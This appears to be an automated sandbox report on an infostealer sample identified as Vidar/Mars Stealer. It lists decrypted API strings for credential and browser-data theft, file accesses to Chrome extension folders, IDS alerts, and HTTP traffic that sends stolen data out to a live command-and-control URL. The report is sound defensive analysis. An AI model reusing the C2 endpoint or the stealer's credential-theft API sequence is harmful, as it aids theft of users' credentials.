Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: DeleteFileA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: lstrcmpW
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: lstrcmpW
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GlobalAlloc
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GlobalAlloc
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: FreeLibrary
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: FreeLibrary
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: SetCurrentDirectoryA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: SetCurrentDirectoryA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: CreateFileMappingA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: CreateFileMappingA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: MapViewOfFile
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: MapViewOfFile
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: UnmapViewOfFile
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: UnmapViewOfFile
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: FileTimeToSystemTime
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: FileTimeToSystemTime
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetFileInformationByHandle
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetFileInformationByHandle
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GlobalLock
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GlobalLock
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GlobalSize
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GlobalSize
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: WideCharToMultiByte
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: WideCharToMultiByte
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetWindowsDirectoryA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetWindowsDirectoryA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetVolumeInformationA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetVolumeInformationA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetVersionExA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetVersionExA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetModuleFileNameA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetModuleFileNameA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: CreateFileW
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: CreateFileW
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: CreateFileMappingW
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: MultiByteToWideChar
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: CreateThread
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetEnvironmentVariableA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: SetEnvironmentVariableA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: lstrcpyA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: lstrcpynA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: InternetOpenA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: InternetConnectA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: HttpOpenRequestA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: HttpSendRequestA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: HttpQueryInfoA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: InternetCloseHandle
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: InternetReadFile
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: InternetSetOptionA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: InternetOpenUrlA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: InternetCrackUrlA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: wsprintfA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: CharToOemW
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetKeyboardLayoutList
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: EnumDisplayDevicesA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: ReleaseDC
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetDC
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetSystemMetrics
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetDesktopWindow
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetWindowRect
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetWindowDC
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: CloseWindow
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: RegOpenKeyExA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: RegQueryValueExA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: RegCloseKey
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetCurrentHwProfileA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: RegEnumKeyExA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: RegGetValueA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: CreateDCA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetDeviceCaps
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: CreateCompatibleDC
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: CreateCompatibleBitmap
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: SelectObject
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: BitBlt
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: DeleteObject
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: StretchBlt
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetObjectW
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetDIBits
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: SaveDC
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: CreateDIBSection
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: DeleteDC
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: RestoreDC
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: DsRoleGetPrimaryDomainInformation
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetModuleFileNameExA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: CryptUnprotectData
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: BCryptCloseAlgorithmProvider
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: BCryptDestroyKey
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: BCryptOpenAlgorithmProvider
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: BCryptSetProperty
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: BCryptGenerateSymmetricKey
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: BCryptDecrypt
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: VaultOpenVault
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: VaultCloseVault
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: VaultEnumerateItems
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: VaultGetItemWin8
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: VaultGetItemWin7
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: VaultFree
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: StrCmpCA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: StrStrA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: PathMatchSpecA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: SHGetFolderPathA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: ShellExecuteExA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GdipGetImageEncodersSize
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GdipGetImageEncoders
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GdipCreateBitmapFromHBITMAP
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GdiplusStartup
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GdiplusShutdown
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GdipSaveImageToStream
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_00408E30 CryptUnprotectData,LocalAlloc,LocalFree, 0_2_00408E30
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_00405450 memset,CryptStringToBinaryA,CryptStringToBinaryA, 0_2_00405450
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_004090C0 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat, 0_2_004090C0
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_00408AB0 CryptUnprotectData, 0_2_00408AB0
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_00408D90 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree, 0_2_00408D90

Compliance

Source: C:\Users\user\Desktop\m0wsoI3.exe Unpacked PE file: 0.2.m0wsoI3.exe.60900000.1.unpack
Source: m0wsoI3.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: m0wsoI3.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: m0wsoI3.exe, 00000000.00000002.1309437455.00000000100BE000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.0.dr
Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: m0wsoI3.exe, 00000000.00000002.1308783263.000000000F65B000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.0.dr
Source: Binary string: vcruntime140.i386.pdb source: vcruntime140.dll.0.dr
Source: Binary string: vcruntime140.i386.pdbGCTL source: vcruntime140.dll.0.dr
Source: Binary string: msvcp140.i386.pdbGCTL source: msvcp140.dll.0.dr
Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\mozglue\build\mozglue.pdb source: m0wsoI3.exe, 00000000.00000002.1300238771.0000000000584000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.0.dr
Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: m0wsoI3.exe, 00000000.00000002.1309437455.00000000100BE000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.0.dr
Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\mozglue\build\mozglue.pdb22! source: m0wsoI3.exe, 00000000.00000002.1300238771.0000000000584000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.0.dr
Source: Binary string: msvcp140.i386.pdb source: msvcp140.dll.0.dr
Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss3.pdb source: nss3.dll.0.dr
Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: m0wsoI3.exe, 00000000.00000002.1308783263.000000000F65B000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.0.dr
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_00407620 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrlen,PathMatchSpecA,CopyFileA,DeleteFileA,PathMatchSpecA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00407620
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_00401280 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 0_2_00401280
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_00401090 SetCurrentDirectoryA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 0_2_00401090
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_0040A150 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_0040A150
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_0040B570 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,FindNextFileA,FindClose, 0_2_0040B570
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_0040B110 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 0_2_0040B110
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_0040B3A0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_0040B3A0
Source: C:\Users\user\Desktop\m0wsoI3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Users\user\Desktop\m0wsoI3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: C:\Users\user\Desktop\m0wsoI3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Users\user\Desktop\m0wsoI3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\Desktop\m0wsoI3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Users\user\Desktop\m0wsoI3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\

Networking

Source: Network traffic Suricata IDS: 2022818 - Severity 1 - ET MALWARE Generic gate .php GET with minimal headers : 192.168.2.6:49693 -> 188.114.97.3:80
Source: Network traffic Suricata IDS: 2035884 - Severity 1 - ET MALWARE Base64 Encoded Stealer Config from Server - APPDATA or USERPROFILE Environment Variable M4 : 188.114.97.3:80 -> 192.168.2.6:49693
Source: Network traffic Suricata IDS: 2036654 - Severity 1 - ET MALWARE Win32/Vidar Variant/Mars Stealer Resources Download : 188.114.97.3:80 -> 192.168.2.6:49693
Source: Network traffic Suricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.6:49693 -> 188.114.97.3:80
Source: Network traffic Suricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.6:49693 -> 188.114.97.3:80
Source: Network traffic Suricata IDS: 2033163 - Severity 1 - ET MALWARE Win32/Vidar Variant/Mars Stealer CnC Exfil : 192.168.2.6:49693 -> 188.114.97.3:80
Source: Malware configuration extractor URLs: ctrlgem.xyz/gate.php
Source: DNS query: ctrlgem.xyz
Source: global traffic HTTP traffic detected: GET /gate.php HTTP/1.1Host: ctrlgem.xyzConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /request HTTP/1.1Host: ctrlgem.xyzCache-Control: no-cacheCookie: PHPSESSID=291d239f3940517dbefb215d3b920d7e
Source: global traffic HTTP traffic detected: POST /gate.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ZUKFK6PZ58YM7QQ1Host: ctrlgem.xyzContent-Length: 93766Connection: Keep-AliveCache-Control: no-cacheCookie: PHPSESSID=291d239f3940517dbefb215d3b920d7e
Source: Joe Sandbox View IP Address: 188.114.97.3
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_00406040 GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetSetOptionA,InternetOpenUrlA,InternetReadFile,InternetCloseHandle,InternetCloseHandle, 0_2_00406040
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 17 Mar 2025 12:22:11 GMTContent-Length: 1565849Connection: keep-aliveLast-Modified: Mon, 21 Feb 2022 23:34:00 GMTAccept-Ranges: bytescf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QVm1w7ydFyweCFchTxOdOGkd5n3m5BqZPfpwO0lSXEklBICOkCzctCPZvcqino7sfa6%2FEHPK4ouxaWt7GCxbOH%2FFbj6Lybh844BrAJjQUzoQlkx7HcBACg6IArACng%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 921c74547fa60f89-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1669&min_rtt=1656&rtt_var=648&sent=4&recv=5&lost=0&retrans=0&sent_bytes=1198&recv_bytes=215&delivery_rate=1655328&cwnd=237&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 50 4b 03 04 14 00 00 00 08 00 0d 7a 3e 54 c5 85 06 76 05 31 01 00 d0 35 02 00 0c 00 00 00 73 6f 66 74 6f 6b 6e 33 2e 64 6c 6c ec 5b 7d 78 14 45 9a ef 9e 99 84 49 98 64 1a 48 30 3c 04 09 6c f0 b2 8a 18 18 58 12 09 18 20 9d 8d 42 60 d8 81 99 04 c8 07 5f 3a 8e 01 42 9c c6 9c 4f 50 d8 c9 28 b3 cd 78 78 8b 0a b7 ec 0a 0a 1e 77 b2 ae ab a0 39 37 a7 e3 05 49 60 05 f9 d2 45 c5 5d 5c 61 af 71 b2 4b 74 73 31 ba 39 fa de aa ea ee 99 ae ee e4 f4 b9 7f 8f e7 c1 aa a9 fe d5 fb fe de 8f 7a ab aa 1b 2b 97 ef 64 ac 0c c3 d8 e0 af 2c 33 4c 1b 43 fe 94 32 df e2 0f cb 30 99 e3 df c8 64 8e a4 9d 9a d0 c6 2e 3c 35 61 a9 ff fe 07 f3 1a 9b 36 de d7 b4 6a 7d de 9a 55 1b 36 6c 0c e6 ad 5e 97 d7 24 6c c8 bb 7f 43 5e d9 62 4f de fa 8d 6b d7 4d c9 c8 48 cf 57 44 3c d7 90 9f fb a7 8c 7b 16 ab 7f af 0b 1f 2e fe 1c da bb 36 2e 58 74 05 b7 77 2b ed e2 45 dd b8 5d b4 e8 cf d0 1e 5b 4f 9e df be 61 c1 a2 ab 78 ee 82 c5 8f e0 df 8b 16 7d 89 db 7b 16 fd 27 6e 8f 2e 26 6d 05 fe fd a3 fb d7 f8 91 1e d5 04 37 cf 30 0b d9 14 e6 ad d5 f1 15 ea d8 65 66 e2 84 e1 6c e6 70 e6 35 30 70 35 19 7b a6 1d fa 1c 74 ce b0 e8 27 87 fb 16 86 49 65 f0 6f ad 65 dc 16 ec cc b4 5f 5b e0 71 29 99 c4 31 4c a2 25 0d 67 b5 30 87 a0 6d 83 b6 0b 0d 16 5a 98 66 6b 92 6f 73 2c cc 99 71 28 10 16 a6 3e 13 d4 de 60 99 a5 cc Data Ascii: PKz>Tv15softokn3.dll[}xEIdH0<lX B`_:BOP(xxw97I`E]\aqKts19z+d,3LC20d.<5a6j}U6l^$lC^bOkMHWD<{.6.Xtw+E][Oax}{'n.&m70eflp50p5{t'Ieoe_[q)1L%g0mZfkos,q(>`
Source: global traffic DNS traffic detected: DNS query: ctrlgem.xyz
Source: unknown HTTP traffic detected: POST /gate.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ZUKFK6PZ58YM7QQ1Host: ctrlgem.xyzContent-Length: 93766Connection: Keep-AliveCache-Control: no-cacheCookie: PHPSESSID=291d239f3940517dbefb215d3b920d7e
Source: m0wsoI3.exe, 00000000.00000002.1309437455.00000000100BE000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000000.00000002.1308783263.000000000F65B000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000000.00000002.1300238771.0000000000584000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000000.00000002.1308783263.000000000F688000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, freebl3.dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: m0wsoI3.exe, 00000000.00000002.1309437455.00000000100BE000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000000.00000002.1308783263.000000000F65B000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000000.00000002.1300238771.0000000000584000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000000.00000002.1308783263.000000000F688000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, freebl3.dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: m0wsoI3.exe, 00000000.00000002.1309437455.00000000100BE000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000000.00000002.1308783263.000000000F65B000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000000.00000002.1300238771.0000000000584000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000000.00000002.1308783263.000000000F688000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, freebl3.dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: m0wsoI3.exe, 00000000.00000002.1309437455.00000000100BE000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000000.00000002.1308783263.000000000F65B000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000000.00000002.1300238771.0000000000584000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000000.00000002.1308783263.000000000F688000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, freebl3.dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: m0wsoI3.exe, 00000000.00000002.1309437455.00000000100BE000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000000.00000002.1308783263.000000000F65B000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000000.00000002.1300238771.0000000000584000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000000.00000002.1308783263.000000000F688000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, freebl3.dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: m0wsoI3.exe, 00000000.00000002.1309437455.00000000100BE000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000000.00000002.1308783263.000000000F65B000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000000.00000002.1300238771.0000000000584000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000000.00000002.1308783263.000000000F688000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, freebl3.dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: m0wsoI3.exe, 00000000.00000002.1309437455.00000000100BE000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000000.00000002.1308783263.000000000F65B000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000000.00000002.1300238771.0000000000584000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000000.00000002.1308783263.000000000F688000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, freebl3.dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: m0wsoI3.exe, 00000000.00000002.1300238771.0000000000507000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctrlgem.xyz/gate.php
Source: m0wsoI3.exe, 00000000.00000002.1300238771.0000000000507000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctrlgem.xyz/requestb
Source: m0wsoI3.exe, 00000000.00000002.1300238771.0000000000507000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctrlgem.xyz/requestj
Source: m0wsoI3.exe, 00000000.00000002.1309437455.00000000100BE000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000000.00000002.1308783263.000000000F65B000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000000.00000002.1300238771.0000000000584000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000000.00000002.1308783263.000000000F688000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, freebl3.dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: m0wsoI3.exe, 00000000.00000002.1309437455.00000000100BE000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000000.00000002.1308783263.000000000F65B000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000000.00000002.1300238771.0000000000584000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000000.00000002.1308783263.000000000F688000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, freebl3.dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0N
Source: m0wsoI3.exe, 00000000.00000002.1309437455.00000000100BE000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000000.00000002.1308783263.000000000F65B000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000000.00000002.1300238771.0000000000584000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000000.00000002.1308783263.000000000F688000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, freebl3.dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.thawte.com0
Source: m0wsoI3.exe, 00000000.00000002.1309437455.00000000100BE000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000000.00000002.1308783263.000000000F65B000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000000.00000002.1300238771.0000000000584000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000000.00000002.1308783263.000000000F688000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, freebl3.dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: m0wsoI3.exe, 00000000.00000002.1309437455.00000000100BE000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000000.00000002.1308783263.000000000F65B000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000000.00000002.1300238771.0000000000584000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000000.00000002.1308783263.000000000F688000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, freebl3.dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
